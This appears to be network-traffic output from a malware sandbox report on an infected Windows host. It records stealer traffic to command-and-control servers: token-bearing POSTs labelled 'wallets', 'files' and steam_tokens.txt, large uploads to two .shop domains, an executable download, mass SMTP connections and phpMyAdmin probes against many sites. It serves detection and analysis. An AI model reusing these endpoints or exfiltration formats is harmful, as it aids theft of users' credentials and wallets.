Ascii: ------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="message"wallets------DAFCAAEGDBKJJKECBKFH--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKKHost: 185.172.128.145Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 2d 2d 0d 0a Data Ascii: ------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="message"files------EHIDAKECFIEBGDHJEBKK--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAAHost: 185.172.128.145Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFHHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIEHost: 185.172.128.145Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEHHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFCBAKKFBFIECAEBAEHost: 185.172.128.145Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBAHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCFHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFCHost: 185.172.128.145Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJECFIECBGDGCAAAEHIHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 185.172.128.145Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBGIIJDGHCBGCBFIEGHost: 185.172.128.145Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFHDBAAECAAKFHDHIIHost: 185.172.128.145Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGCHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGIHost: 185.172.128.145Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJEBKKEHJDGCBGCFCGHost: 185.172.128.145Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJJKEHCAKEGCAKJKECHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCGIIEHIEGDGDGCAEBGHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFHCGIDBAAFHIDHDAAEHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFIHost: 185.172.128.145Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFHHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDHost: 185.172.128.145Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBAHost: 185.172.128.145Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKJEHDBGHIEBGCGDGHHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGDHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFIIHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBFBAEBKJJJJKFCGCBHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBGIIJDGHCBGCBFIEGHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKKHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBGHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDAHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCAHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAKHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFCHost: 185.172.128.145Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFCHost: 185.172.128.145Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 2d 2d 0d 0a Data Ascii: ------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="file"------FCFBFBFBKFIDHJKFCAFC--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGDGIDGIJKKEBGDAECAHost: 185.172.128.145Content-Length: 142023Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJHost: 185.172.128.145Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 2d 2d 0d 0a Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="message"jbdtaijovg------KKFCFBKFCFBFIDGCGDHJ--

Source: unknown

FTP traffic detected: 162.0.235.125:21 -> 192.168.2.6:50939 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 45 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 45 allowed.220-Local time is now 18:26. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 45 allowed.220-Local time is now 18:26. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 45 allowed.220-Local time is now 18:26. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 45 allowed.220-Local time is now 18:26. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	TCP traffic: 192.168.2.6:59319 -> 46.105.45.21:587
Source: global traffic	TCP traffic: 192.168.2.6:59615 -> 142.250.31.27:587
Source: global traffic	TCP traffic: 192.168.2.6:62271 -> 81.169.145.97:587
Source: global traffic	TCP traffic: 192.168.2.6:62348 -> 103.224.212.34:587
Source: global traffic	TCP traffic: 192.168.2.6:62528 -> 88.99.82.73:587
Source: global traffic	TCP traffic: 192.168.2.6:62610 -> 142.93.237.125:587
Source: global traffic	TCP traffic: 192.168.2.6:62903 -> 212.227.15.41:587
Source: global traffic	TCP traffic: 192.168.2.6:63082 -> 217.72.192.67:587
Source: global traffic	TCP traffic: 192.168.2.6:63126 -> 38.111.198.185:587
Source: global traffic	TCP traffic: 192.168.2.6:65138 -> 202.124.241.196:587
Source: global traffic	TCP traffic: 192.168.2.6:65192 -> 162.255.118.13:587
Source: global traffic	TCP traffic: 192.168.2.6:51041 -> 185.177.47.38:587
Source: global traffic	TCP traffic: 192.168.2.6:53149 -> 104.21.54.169:587
Source: global traffic	TCP traffic: 192.168.2.6:53362 -> 130.185.80.210:587
Source: global traffic	TCP traffic: 192.168.2.6:53491 -> 13.248.169.48:587
Source: global traffic	TCP traffic: 192.168.2.6:53670 -> 15.197.142.173:587
Source: global traffic	TCP traffic: 192.168.2.6:55635 -> 15.197.204.56:587
Source: global traffic	TCP traffic: 192.168.2.6:56173 -> 104.47.24.36:587
Source: global traffic	TCP traffic: 192.168.2.6:56304 -> 52.101.9.0:587
Source: global traffic	TCP traffic: 192.168.2.6:57161 -> 104.47.22.74:587
Source: global traffic	TCP traffic: 192.168.2.6:57428 -> 104.47.25.36:587
Source: global traffic	TCP traffic: 192.168.2.6:57844 -> 223.29.45.22:587
Source: global traffic	TCP traffic: 192.168.2.6:58907 -> 59.106.13.100:587
Source: global traffic	TCP traffic: 192.168.2.6:59213 -> 3.33.139.32:587
Source: global traffic	TCP traffic: 192.168.2.6:59259 -> 85.119.249.224:587
Source: global traffic	TCP traffic: 192.168.2.6:59288 -> 64.233.184.27:587
Source: global traffic	TCP traffic: 192.168.2.6:59297 -> 91.136.8.194:587
Source: global traffic	TCP traffic: 192.168.2.6:59486 -> 52.101.73.8:587
Source: global traffic	TCP traffic: 192.168.2.6:59487 -> 52.101.68.27:587
Source: global traffic	TCP traffic: 192.168.2.6:59490 -> 104.47.66.10:587
Source: global traffic	TCP traffic: 192.168.2.6:59914 -> 76.223.54.146:587
Source: global traffic	TCP traffic: 192.168.2.6:60012 -> 185.107.56.198:587
Source: global traffic	TCP traffic: 192.168.2.6:60021 -> 122.146.164.33:587
Source: global traffic	TCP traffic: 192.168.2.6:60026 -> 209.85.202.26:587
Source: global traffic	TCP traffic: 192.168.2.6:60266 -> 3.33.152.147:587
Source: global traffic	TCP traffic: 192.168.2.6:60279 -> 52.101.73.11:587
Source: global traffic	TCP traffic: 192.168.2.6:60282 -> 142.250.153.26:587
Source: global traffic	TCP traffic: 192.168.2.6:60330 -> 217.70.178.1:587
Source: global traffic	TCP traffic: 192.168.2.6:60361 -> 138.197.213.185:587
Source: global traffic	TCP traffic: 192.168.2.6:60380 -> 20.75.101.58:587
Source: global traffic	TCP traffic: 192.168.2.6:60457 -> 15.161.71.77:587
Source: global traffic	TCP traffic: 192.168.2.6:60838 -> 3.33.243.145:587
Source: global traffic	TCP traffic: 192.168.2.6:60876 -> 52.101.8.34:587
Source: global traffic	TCP traffic: 192.168.2.6:60973 -> 86.105.245.69:587
Source: global traffic	TCP traffic: 192.168.2.6:60974 -> 143.244.202.96:587
Source: global traffic	TCP traffic: 192.168.2.6:61041 -> 52.101.41.4:587
Source: global traffic	TCP traffic: 192.168.2.6:61043 -> 52.101.41.0:587
Source: global traffic	TCP traffic: 192.168.2.6:61047 -> 104.47.22.10:587
Source: global traffic	TCP traffic: 192.168.2.6:61082 -> 142.250.27.26:587

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: isotrimorphicnongrasse.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: isotrimorphicnongrasse.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14025Host: isotrimorphicnongrasse.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16255Host: isotrimorphicnongrasse.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19961Host: isotrimorphicnongrasse.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14034Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16264Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5444Host: isotrimorphicnongrasse.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1329Host: isotrimorphicnongrasse.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19970Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 419034Host: isotrimorphicnongrasse.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5453Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1369Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 428413Host: resergvearyinitiani.shop
Source: global traffic	HTTP traffic detected: GET /BeachGeology.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: wearethebestin2024.com
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mwpmedia.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: caspiantravel.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cabinet-orsika.frAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.twAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cfgteam.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: blauthlaw.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: publichouse.ieAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: stylesense.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.twAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
